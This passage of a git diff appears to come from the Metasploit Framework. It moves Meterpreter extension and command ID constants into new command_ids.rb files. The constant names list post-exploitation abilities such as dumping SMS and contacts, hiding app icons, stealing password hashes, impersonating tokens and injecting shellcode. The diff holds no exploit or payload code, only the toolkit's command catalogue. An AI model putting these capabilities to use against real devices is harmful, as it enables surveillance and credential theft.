+      ::File.directory?(::File.join(base, e)) && !['.', '..'].include?(e)
+    }
+    names.each { |n|
+      STDERR.puts("EXTENSION_ID_#{n.upcase} = #{self.get_extension_id(n)}\n")
+    }
   end
 
 end
diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb
index 4a11370d7dc05..fd33be442071c 100644
--- a/lib/rex/post/meterpreter/extensions/android/android.rb
+++ b/lib/rex/post/meterpreter/extensions/android/android.rb
@@ -1,7 +1,7 @@
-#!/usr/bin/env ruby
 #
 # -*- coding: binary -*-
 require 'rex/post/meterpreter/extensions/android/tlv'
+require 'rex/post/meterpreter/extensions/android/command_ids'
 require 'rex/post/meterpreter/packet'
 require 'rex/post/meterpreter/client'
 require 'rex/post/meterpreter/channels/pools/stream_pool'
diff --git a/lib/rex/post/meterpreter/extensions/android/command_ids.rb b/lib/rex/post/meterpreter/extensions/android/command_ids.rb
new file mode 100644
index 0000000000000..6a8a7620b65b1
--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/android/command_ids.rb
@@ -0,0 +1,33 @@
+# -*- coding: binary -*-
+
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Android
+
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_ANDROID = 5000
+
+# Associated command ids
+COMMAND_ID_ANDROID_ACTIVITY_START   = EXTENSION_ID_ANDROID + 1
+COMMAND_ID_ANDROID_CHECK_ROOT       = EXTENSION_ID_ANDROID + 2
+COMMAND_ID_ANDROID_DEVICE_SHUTDOWN  = EXTENSION_ID_ANDROID + 3
+COMMAND_ID_ANDROID_DUMP_CALLLOG     = EXTENSION_ID_ANDROID + 4
+COMMAND_ID_ANDROID_DUMP_CONTACTS    = EXTENSION_ID_ANDROID + 5
+COMMAND_ID_ANDROID_DUMP_SMS         = EXTENSION_ID_ANDROID + 6
+COMMAND_ID_ANDROID_GEOLOCATE        = EXTENSION_ID_ANDROID + 7
+COMMAND_ID_ANDROID_HIDE_APP_ICON    = EXTENSION_ID_ANDROID + 8
+COMMAND_ID_ANDROID_INTERVAL_COLLECT = EXTENSION_ID_ANDROID + 9
+COMMAND_ID_ANDROID_SEND_SMS         = EXTENSION_ID_ANDROID + 10
+COMMAND_ID_ANDROID_SET_AUDIO_MODE   = EXTENSION_ID_ANDROID + 11
+COMMAND_ID_ANDROID_SET_WALLPAPER    = EXTENSION_ID_ANDROID + 12
+COMMAND_ID_ANDROID_SQLITE_QUERY     = EXTENSION_ID_ANDROID + 13
+COMMAND_ID_ANDROID_WAKELOCK         = EXTENSION_ID_ANDROID + 14
+COMMAND_ID_ANDROID_WLAN_GEOLOCATE   = EXTENSION_ID_ANDROID + 15
+
+end
+end
+end
+end
+end
diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb
index 871573020dd0b..7956b1853c182 100644
--- a/lib/rex/post/meterpreter/extensions/android/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb
@@ -1,4 +1,3 @@
-#!/usr/bin/env ruby
 # -*- coding: binary -*-
 
 module Rex
@@ -7,26 +6,6 @@ module Meterpreter
 module Extensions
 module Android
 
-# ID for the extension (needs to be a multiple of 1000)
-EXTENSION_ID_ANDROID = 5000
-
-# Associated command ids
-COMMAND_ID_ANDROID_ACTIVITY_START   = EXTENSION_ID_ANDROID + 1
-COMMAND_ID_ANDROID_CHECK_ROOT       = EXTENSION_ID_ANDROID + 2
-COMMAND_ID_ANDROID_DEVICE_SHUTDOWN  = EXTENSION_ID_ANDROID + 3
-COMMAND_ID_ANDROID_DUMP_CALLLOG     = EXTENSION_ID_ANDROID + 4
-COMMAND_ID_ANDROID_DUMP_CONTACTS    = EXTENSION_ID_ANDROID + 5
-COMMAND_ID_ANDROID_DUMP_SMS         = EXTENSION_ID_ANDROID + 6
-COMMAND_ID_ANDROID_GEOLOCATE        = EXTENSION_ID_ANDROID + 7
-COMMAND_ID_ANDROID_HIDE_APP_ICON    = EXTENSION_ID_ANDROID + 8
-COMMAND_ID_ANDROID_INTERVAL_COLLECT = EXTENSION_ID_ANDROID + 9
-COMMAND_ID_ANDROID_SEND_SMS         = EXTENSION_ID_ANDROID + 10
-COMMAND_ID_ANDROID_SET_AUDIO_MODE   = EXTENSION_ID_ANDROID + 11
-COMMAND_ID_ANDROID_SET_WALLPAPER    = EXTENSION_ID_ANDROID + 12
-COMMAND_ID_ANDROID_SQLITE_QUERY     = EXTENSION_ID_ANDROID + 13
-COMMAND_ID_ANDROID_WAKELOCK         = EXTENSION_ID_ANDROID + 14
-COMMAND_ID_ANDROID_WLAN_GEOLOCATE   = EXTENSION_ID_ANDROID + 15
-
 TLV_TYPE_SMS_ADDRESS                 = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9001)
 TLV_TYPE_SMS_BODY                    = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9002)
 TLV_TYPE_SMS_TYPE                    = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9003)
diff --git a/lib/rex/post/meterpreter/extensions/appapi/appapi.rb b/lib/rex/post/meterpreter/extensions/appapi/appapi.rb
index 06878fe0a1364..ee0eb3e181b1b 100644
--- a/lib/rex/post/meterpreter/extensions/appapi/appapi.rb
+++ b/lib/rex/post/meterpreter/extensions/appapi/appapi.rb
@@ -1,6 +1,7 @@
 # -*- coding: binary -*-
 
 require 'rex/post/meterpreter/extensions/appapi/tlv'
+require 'rex/post/meterpreter/extensions/appapi/command_ids'
 
 module Rex
 module Post
diff --git a/lib/rex/post/meterpreter/extensions/appapi/command_ids.rb b/lib/rex/post/meterpreter/extensions/appapi/command_ids.rb
new file mode 100644
index 0000000000000..3a3210056c8e9
--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/appapi/command_ids.rb
@@ -0,0 +1,20 @@
+# -*- coding: binary -*-
+# CorrM @ fb.me/IslamNofl
+
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module AppApi
+
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_APPAPI = 9000
+
+# Associated command ids
+COMMAND_ID_APPAPI_APP_INSTALL   = EXTENSION_ID_APPAPI + 1
+COMMAND_ID_APPAPI_APP_LIST      = EXTENSION_ID_APPAPI + 2
+COMMAND_ID_APPAPI_APP_RUN       = EXTENSION_ID_APPAPI + 3
+COMMAND_ID_APPAPI_APP_UNINSTALL = EXTENSION_ID_APPAPI + 4
+
+end; end; end; end; end
+
diff --git a/lib/rex/post/meterpreter/extensions/appapi/tlv.rb b/lib/rex/post/meterpreter/extensions/appapi/tlv.rb
index f2b0fbadd34ef..851e9017eb61d 100644
--- a/lib/rex/post/meterpreter/extensions/appapi/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/appapi/tlv.rb
@@ -7,15 +7,6 @@ module Meterpreter
 module Extensions
 module AppApi
 
-# ID for the extension (needs to be a multiple of 1000)
-EXTENSION_ID_APPAPI = 9000
-
-# Associated command ids
-COMMAND_ID_APPAPI_APP_INSTALL   = EXTENSION_ID_APPAPI + 1
-COMMAND_ID_APPAPI_APP_LIST      = EXTENSION_ID_APPAPI + 2
-COMMAND_ID_APPAPI_APP_RUN       = EXTENSION_ID_APPAPI + 3
-COMMAND_ID_APPAPI_APP_UNINSTALL = EXTENSION_ID_APPAPI + 4
-
 ##
 #
 # Apps
diff --git a/lib/rex/post/meterpreter/extensions/espia/command_ids.rb b/lib/rex/post/meterpreter/extensions/espia/command_ids.rb
new file mode 100644
index 0000000000000..ca46e01dc81bd
--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/espia/command_ids.rb
@@ -0,0 +1,18 @@
+# -*- coding: binary -*-
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Espia
+
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_ESPIA = 11000
+
+# Associated command ids
+COMMAND_ID_ESPIA_IMAGE_GET_DEV_SCREEN = EXTENSION_ID_ESPIA + 1
+
+end
+end
+end
+end
+end
diff --git a/lib/rex/post/meterpreter/extensions/espia/espia.rb b/lib/rex/post/meterpreter/extensions/espia/espia.rb
index 06da92e21fdb6..32c30f93cdb42 100644
--- a/lib/rex/post/meterpreter/extensions/espia/espia.rb
+++ b/lib/rex/post/meterpreter/extensions/espia/espia.rb
@@ -1,6 +1,7 @@
 # -*- coding: binary -*-
 
 require 'rex/post/meterpreter/extensions/espia/tlv'
+require 'rex/post/meterpreter/extensions/espia/command_ids'
 
 module Rex
 module Post
diff --git a/lib/rex/post/meterpreter/extensions/espia/tlv.rb b/lib/rex/post/meterpreter/extensions/espia/tlv.rb
index e9d62de91920b..1ae21b9bb207a 100644
--- a/lib/rex/post/meterpreter/extensions/espia/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/espia/tlv.rb
@@ -5,12 +5,6 @@ module Meterpreter
 module Extensions
 module Espia
 
-# ID for the extension (needs to be a multiple of 1000)
-EXTENSION_ID_ESPIA = 11000
-
-# Associated command ids
-COMMAND_ID_ESPIA_IMAGE_GET_DEV_SCREEN = EXTENSION_ID_ESPIA + 1
-
 TLV_TYPE_DEV_IMAGE = TLV_META_TYPE_UINT| (TLV_EXTENSIONS + 911)
 TLV_TYPE_DEV_AUDIO = TLV_META_TYPE_STRING| (TLV_EXTENSIONS + 912)
 TLV_TYPE_DEV_SCREEN = TLV_META_TYPE_RAW| (TLV_EXTENSIONS + 913)
diff --git a/lib/rex/post/meterpreter/extensions/extapi/command_ids.rb b/lib/rex/post/meterpreter/extensions/extapi/command_ids.rb
new file mode 100644
index 0000000000000..a35380da8c6e9
--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/extapi/command_ids.rb
@@ -0,0 +1,33 @@
+# -*- coding: binary -*-
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Extapi
+
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_EXTAPI = 3000
+
+# Associated command ids
+COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY        = EXTENSION_ID_EXTAPI + 1
+COMMAND_ID_EXTAPI_CLIPBOARD_GET_DATA       = EXTENSION_ID_EXTAPI + 2
+COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_DUMP   = EXTENSION_ID_EXTAPI + 3
+COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PAUSE  = EXTENSION_ID_EXTAPI + 4
+COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PURGE  = EXTENSION_ID_EXTAPI + 5
+COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_RESUME = EXTENSION_ID_EXTAPI + 6
+COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_START  = EXTENSION_ID_EXTAPI + 7
+COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_STOP   = EXTENSION_ID_EXTAPI + 8
+COMMAND_ID_EXTAPI_CLIPBOARD_SET_DATA       = EXTENSION_ID_EXTAPI + 9
+COMMAND_ID_EXTAPI_NTDS_PARSE               = EXTENSION_ID_EXTAPI + 10
+COMMAND_ID_EXTAPI_PAGEANT_SEND_QUERY       = EXTENSION_ID_EXTAPI + 11
+COMMAND_ID_EXTAPI_SERVICE_CONTROL          = EXTENSION_ID_EXTAPI + 12
+COMMAND_ID_EXTAPI_SERVICE_ENUM             = EXTENSION_ID_EXTAPI + 13
+COMMAND_ID_EXTAPI_SERVICE_QUERY            = EXTENSION_ID_EXTAPI + 14
+COMMAND_ID_EXTAPI_WINDOW_ENUM              = EXTENSION_ID_EXTAPI + 15
+COMMAND_ID_EXTAPI_WMI_QUERY                = EXTENSION_ID_EXTAPI + 16
+
+end
+end
+end
+end
+end
diff --git a/lib/rex/post/meterpreter/extensions/extapi/extapi.rb b/lib/rex/post/meterpreter/extensions/extapi/extapi.rb
index 05dc02c946f0d..f58bfae75b49a 100644
--- a/lib/rex/post/meterpreter/extensions/extapi/extapi.rb
+++ b/lib/rex/post/meterpreter/extensions/extapi/extapi.rb
@@ -1,6 +1,7 @@
 # -*- coding: binary -*-
 
 require 'rex/post/meterpreter/extensions/extapi/tlv'
+require 'rex/post/meterpreter/extensions/extapi/command_ids'
 require 'rex/post/meterpreter/extensions/extapi/window/window'
 require 'rex/post/meterpreter/extensions/extapi/service/service'
 require 'rex/post/meterpreter/extensions/extapi/clipboard/clipboard'
diff --git a/lib/rex/post/meterpreter/extensions/extapi/tlv.rb b/lib/rex/post/meterpreter/extensions/extapi/tlv.rb
index 609fd8e49a329..9f4c09c95a459 100644
--- a/lib/rex/post/meterpreter/extensions/extapi/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/extapi/tlv.rb
@@ -5,27 +5,6 @@ module Meterpreter
 module Extensions
 module Extapi
 
-# ID for the extension (needs to be a multiple of 1000)
-EXTENSION_ID_EXTAPI = 3000
-
-# Associated command ids
-COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY        = EXTENSION_ID_EXTAPI + 1
-COMMAND_ID_EXTAPI_CLIPBOARD_GET_DATA       = EXTENSION_ID_EXTAPI + 2
-COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_DUMP   = EXTENSION_ID_EXTAPI + 3
-COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PAUSE  = EXTENSION_ID_EXTAPI + 4
-COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PURGE  = EXTENSION_ID_EXTAPI + 5
-COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_RESUME = EXTENSION_ID_EXTAPI + 6
-COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_START  = EXTENSION_ID_EXTAPI + 7
-COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_STOP   = EXTENSION_ID_EXTAPI + 8
-COMMAND_ID_EXTAPI_CLIPBOARD_SET_DATA       = EXTENSION_ID_EXTAPI + 9
-COMMAND_ID_EXTAPI_NTDS_PARSE               = EXTENSION_ID_EXTAPI + 10
-COMMAND_ID_EXTAPI_PAGEANT_SEND_QUERY       = EXTENSION_ID_EXTAPI + 11
-COMMAND_ID_EXTAPI_SERVICE_CONTROL          = EXTENSION_ID_EXTAPI + 12
-COMMAND_ID_EXTAPI_SERVICE_ENUM             = EXTENSION_ID_EXTAPI + 13
-COMMAND_ID_EXTAPI_SERVICE_QUERY            = EXTENSION_ID_EXTAPI + 14
-COMMAND_ID_EXTAPI_WINDOW_ENUM              = EXTENSION_ID_EXTAPI + 15
-COMMAND_ID_EXTAPI_WMI_QUERY                = EXTENSION_ID_EXTAPI + 16
-
 TLV_TYPE_EXTENSION_EXTAPI = 0
 
 TLV_TYPE_EXT_WINDOW_ENUM_GROUP              = TLV_META_TYPE_GROUP  | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 1)
diff --git a/lib/rex/post/meterpreter/extensions/incognito/command_ids.rb b/lib/rex/post/meterpreter/extensions/incognito/command_ids.rb
new file mode 100644
index 0000000000000..1621881f1d8c2
--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/incognito/command_ids.rb
@@ -0,0 +1,23 @@
+# -*- coding: binary -*-
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Incognito
+
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_INCOGNITO = 12000
+
+# Associated command ids
+COMMAND_ID_INCOGNITO_ADD_GROUP_USER      = EXTENSION_ID_INCOGNITO + 1
+COMMAND_ID_INCOGNITO_ADD_LOCALGROUP_USER = EXTENSION_ID_INCOGNITO + 2
+COMMAND_ID_INCOGNITO_ADD_USER            = EXTENSION_ID_INCOGNITO + 3
+COMMAND_ID_INCOGNITO_IMPERSONATE_TOKEN   = EXTENSION_ID_INCOGNITO + 4
+COMMAND_ID_INCOGNITO_LIST_TOKENS         = EXTENSION_ID_INCOGNITO + 5
+COMMAND_ID_INCOGNITO_SNARF_HASHES        = EXTENSION_ID_INCOGNITO + 6
+
+end
+end
+end
+end
+end
diff --git a/lib/rex/post/meterpreter/extensions/incognito/incognito.rb b/lib/rex/post/meterpreter/extensions/incognito/incognito.rb
index bfddad0c6af8b..360262674fab6 100644
--- a/lib/rex/post/meterpreter/extensions/incognito/incognito.rb
+++ b/lib/rex/post/meterpreter/extensions/incognito/incognito.rb
@@ -1,6 +1,7 @@
 # -*- coding: binary -*-
 
 require 'rex/post/meterpreter/extensions/incognito/tlv'
+require 'rex/post/meterpreter/extensions/incognito/command_ids'
 
 module Rex
 module Post
diff --git a/lib/rex/post/meterpreter/extensions/incognito/tlv.rb b/lib/rex/post/meterpreter/extensions/incognito/tlv.rb
index 9dadb86ab2e77..586e69171abe6 100644
--- a/lib/rex/post/meterpreter/extensions/incognito/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/incognito/tlv.rb
@@ -5,17 +5,6 @@ module Meterpreter
 module Extensions
 module Incognito
 
-# ID for the extension (needs to be a multiple of 1000)
-EXTENSION_ID_INCOGNITO = 12000
-
-# Associated command ids
-COMMAND_ID_INCOGNITO_ADD_GROUP_USER      = EXTENSION_ID_INCOGNITO + 1
-COMMAND_ID_INCOGNITO_ADD_LOCALGROUP_USER = EXTENSION_ID_INCOGNITO + 2
-COMMAND_ID_INCOGNITO_ADD_USER            = EXTENSION_ID_INCOGNITO + 3
-COMMAND_ID_INCOGNITO_IMPERSONATE_TOKEN   = EXTENSION_ID_INCOGNITO + 4
-COMMAND_ID_INCOGNITO_LIST_TOKENS         = EXTENSION_ID_INCOGNITO + 5
-COMMAND_ID_INCOGNITO_SNARF_HASHES        = EXTENSION_ID_INCOGNITO + 6
-
 TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION        	= TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2)
 TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION        	= TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 3)
 TLV_TYPE_INCOGNITO_LIST_TOKENS_ORDER       	= TLV_META_TYPE_UINT| (TLV_EXTENSIONS + 4)
diff --git a/lib/rex/post/meterpreter/extensions/kiwi/command_ids.rb b/lib/rex/post/meterpreter/extensions/kiwi/command_ids.rb
new file mode 100644
index 0000000000000..1be5da5edd019
--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/kiwi/command_ids.rb
@@ -0,0 +1,18 @@
+# -*- coding: binary -*-
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Kiwi
+
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_KIWI = 8000
+
+# Associated command ids
+COMMAND_ID_KIWI_EXEC_CMD = EXTENSION_ID_KIWI + 1
+
+end
+end
+end
+end
+end
diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb
index 7c0d820df925c..d38291a0577e5 100644
--- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb
+++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb
@@ -1,6 +1,7 @@
 # -*- coding: binary -*-
 
 require 'rex/post/meterpreter/extensions/kiwi/tlv'
+require 'rex/post/meterpreter/extensions/kiwi/command_ids'
 require 'rexml/document'
 require 'set'
 
diff --git a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb
index 7437679256de5..566aa7711df4e 100644
--- a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb
@@ -5,12 +5,6 @@ module Meterpreter
 module Extensions
 module Kiwi
 
-# ID for the extension (needs to be a multiple of 1000)
-EXTENSION_ID_KIWI = 8000
-
-# Associated command ids
-COMMAND_ID_KIWI_EXEC_CMD = EXTENSION_ID_KIWI + 1
-
 TLV_TYPE_KIWI_CMD        = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 100)
 TLV_TYPE_KIWI_CMD_RESULT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 101)
 
diff --git a/lib/rex/post/meterpreter/extensions/lanattacks/command_ids.rb b/lib/rex/post/meterpreter/extensions/lanattacks/command_ids.rb
new file mode 100644
index 0000000000000..dfc30012dc8ec
--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/lanattacks/command_ids.rb
@@ -0,0 +1,26 @@
+# -*- coding: binary -*-
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Lanattacks
+
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_LANATTACKS = 15000
+
+# Associated command ids
+COMMAND_ID_LANATTACKS_ADD_TFTP_FILE   = EXTENSION_ID_LANATTACKS + 1
+COMMAND_ID_LANATTACKS_DHCP_LOG        = EXTENSION_ID_LANATTACKS + 2
+COMMAND_ID_LANATTACKS_RESET_DHCP      = EXTENSION_ID_LANATTACKS + 3
+COMMAND_ID_LANATTACKS_RESET_TFTP      = EXTENSION_ID_LANATTACKS + 4
+COMMAND_ID_LANATTACKS_SET_DHCP_OPTION = EXTENSION_ID_LANATTACKS + 5
+COMMAND_ID_LANATTACKS_START_DHCP      = EXTENSION_ID_LANATTACKS + 6
+COMMAND_ID_LANATTACKS_START_TFTP      = EXTENSION_ID_LANATTACKS + 7
+COMMAND_ID_LANATTACKS_STOP_DHCP       = EXTENSION_ID_LANATTACKS + 8
+COMMAND_ID_LANATTACKS_STOP_TFTP       = EXTENSION_ID_LANATTACKS + 9
+
+end
+end
+end
+end
+end
diff --git a/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb b/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb
index af3aafe3b184a..5b4e9169030f1 100644
--- a/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb
+++ b/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb
@@ -1,6 +1,7 @@
 # -*- coding: binary -*-
 
 require 'rex/post/meterpreter/extensions/lanattacks/tlv'
+require 'rex/post/meterpreter/extensions/lanattacks/command_ids'
 require 'rex/post/meterpreter/extensions/lanattacks/dhcp/dhcp'
 require 'rex/post/meterpreter/extensions/lanattacks/tftp/tftp'
 
diff --git a/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb b/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb
index d54b673872e5e..7a71196578244 100644
--- a/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb
@@ -5,20 +5,6 @@ module Meterpreter
 module Extensions
 module Lanattacks
 
-# ID for the extension (needs to be a multiple of 1000)
-EXTENSION_ID_LANATTACKS = 15000
-
-# Associated command ids
-COMMAND_ID_LANATTACKS_ADD_TFTP_FILE   = EXTENSION_ID_LANATTACKS + 1
-COMMAND_ID_LANATTACKS_DHCP_LOG        = EXTENSION_ID_LANATTACKS + 2
-COMMAND_ID_LANATTACKS_RESET_DHCP      = EXTENSION_ID_LANATTACKS + 3
-COMMAND_ID_LANATTACKS_RESET_TFTP      = EXTENSION_ID_LANATTACKS + 4
-COMMAND_ID_LANATTACKS_SET_DHCP_OPTION = EXTENSION_ID_LANATTACKS + 5
-COMMAND_ID_LANATTACKS_START_DHCP      = EXTENSION_ID_LANATTACKS + 6
-COMMAND_ID_LANATTACKS_START_TFTP      = EXTENSION_ID_LANATTACKS + 7
-COMMAND_ID_LANATTACKS_STOP_DHCP       = EXTENSION_ID_LANATTACKS + 8
-COMMAND_ID_LANATTACKS_STOP_TFTP       = EXTENSION_ID_LANATTACKS + 9
-
 TLV_TYPE_LANATTACKS_OPTION      = TLV_META_TYPE_RAW    | (TLV_EXTENSIONS + 1)
 TLV_TYPE_LANATTACKS_OPTION_NAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2)
 TLV_TYPE_LANATTACKS_UINT        = TLV_META_TYPE_UINT   | (TLV_EXTENSIONS + 3)
diff --git a/lib/rex/post/meterpreter/extensions/mimikatz/command_ids.rb b/lib/rex/post/meterpreter/extensions/mimikatz/command_ids.rb
new file mode 100644
index 0000000000000..529dc90fecd77
--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/mimikatz/command_ids.rb
@@ -0,0 +1,18 @@
+# -*- coding: binary -*-
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Mimikatz
+
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_MIMIKATZ = 17000
+
+# Associated command ids
+COMMAND_ID_MIMIKATZ_CUSTOM_COMMAND = EXTENSION_ID_MIMIKATZ + 1
+
+end
+end
+end
+end
+end
diff --git a/lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb b/lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb
index 9952f2321a03f..9e86dadc8fe9a 100644
--- a/lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb
+++ b/lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb
@@ -1,6 +1,7 @@
 # -*- coding: binary -*-
 
 require 'rex/post/meterpreter/extensions/mimikatz/tlv'
+require 'rex/post/meterpreter/extensions/mimikatz/command_ids'
 require 'csv'
 
 module Rex
diff --git a/lib/rex/post/meterpreter/extensions/mimikatz/tlv.rb b/lib/rex/post/meterpreter/extensions/mimikatz/tlv.rb
index fb75fa41e7299..c260720b4a5f3 100644
--- a/lib/rex/post/meterpreter/extensions/mimikatz/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/mimikatz/tlv.rb
@@ -5,12 +5,6 @@ module Meterpreter
 module Extensions
 module Mimikatz
 
-# ID for the extension (needs to be a multiple of 1000)
-EXTENSION_ID_MIMIKATZ = 17000
-
-# Associated command ids
-COMMAND_ID_MIMIKATZ_CUSTOM_COMMAND = EXTENSION_ID_MIMIKATZ + 1
-
 TLV_TYPE_MIMIKATZ_RESULT	= TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 1)
 TLV_TYPE_MIMIKATZ_FUNCTION	= TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2)
 TLV_TYPE_MIMIKATZ_ARGUMENT	= TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 3)
diff --git a/lib/rex/post/meterpreter/extensions/networkpug/command_ids.rb b/lib/rex/post/meterpreter/extensions/networkpug/command_ids.rb
new file mode 100644
index 0000000000000..569fe9a31d85d
--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/networkpug/command_ids.rb
@@ -0,0 +1,19 @@
+# -*- coding: binary -*-
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module NetworkPug
+
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_NETWORKPUG = 6000
+
+# Associated command ids
+COMMAND_ID_NETWORKPUG_START = EXTENSION_ID_NETWORKPUG + 1
+COMMAND_ID_NETWORKPUG_STOP  = EXTENSION_ID_NETWORKPUG + 2
+
+end
+end
+end
+end
+end
diff --git a/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb b/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb
index 8f4abdc2d5a34..d5810df46f896 100644
--- a/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb
+++ b/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb
@@ -1,6 +1,7 @@
 # -*- coding: binary -*-
 
 require 'rex/post/meterpreter/extensions/networkpug/tlv'
+require 'rex/post/meterpreter/extensions/networkpug/command_ids'
 
 module Rex
 module Post
diff --git a/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb b/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb
index 22f6b0a9b0e5d..54e5941ab8ab9 100644
--- a/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb
@@ -5,13 +5,6 @@ module Meterpreter
 module Extensions
 module NetworkPug
 
-# ID for the extension (needs to be a multiple of 1000)
-EXTENSION_ID_NETWORKPUG = 6000
-
-# Associated command ids
-COMMAND_ID_NETWORKPUG_START = EXTENSION_ID_NETWORKPUG + 1
-COMMAND_ID_NETWORKPUG_STOP  = EXTENSION_ID_NETWORKPUG + 2
-
 TLV_TYPE_EXTENSION_NETWORKPUG	= 0
 TLV_TYPE_NETWORKPUG_INTERFACE	= TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_NETWORKPUG + TLV_EXTENSIONS + 1)
 TLV_TYPE_NETWORKPUG_FILTER	= TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_NETWORKPUG + TLV_EXTENSIONS + 2)
diff --git a/lib/rex/post/meterpreter/extensions/peinjector/command_ids.rb b/lib/rex/post/meterpreter/extensions/peinjector/command_ids.rb
new file mode 100644
index 0000000000000..d1c23112d28d0
--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/peinjector/command_ids.rb
@@ -0,0 +1,18 @@
+# -*- coding: binary -*-
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Peinjector
+
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_PEINJECTOR = 16000
+
+# Associated command ids
+COMMAND_ID_PEINJECTOR_INJECT_SHELLCODE = EXTENSION_ID_PEINJECTOR + 1
+
+end
+end
+end
+end
+end
diff --git a/lib/rex/post/meterpreter/extensions/peinjector/peinjector.rb b/lib/rex/post/meterpreter/extensions/peinjector/peinjector.rb
index 52b5a91878071..dd90e91e3e56d 100644
--- a/lib/rex/post/meterpreter/extensions/peinjector/peinjector.rb
+++ b/lib/rex/post/meterpreter/extensions/peinjector/peinjector.rb
@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 require 'rex/post/meterpreter/extensions/peinjector/tlv'
+require 'rex/post/meterpreter/extensions/peinjector/command_ids'
 
 module Rex
 module Post
diff --git a/lib/rex/post/meterpreter/extensions/peinjector/tlv.rb b/lib/rex/post/meterpreter/extensions/peinjector/tlv.rb
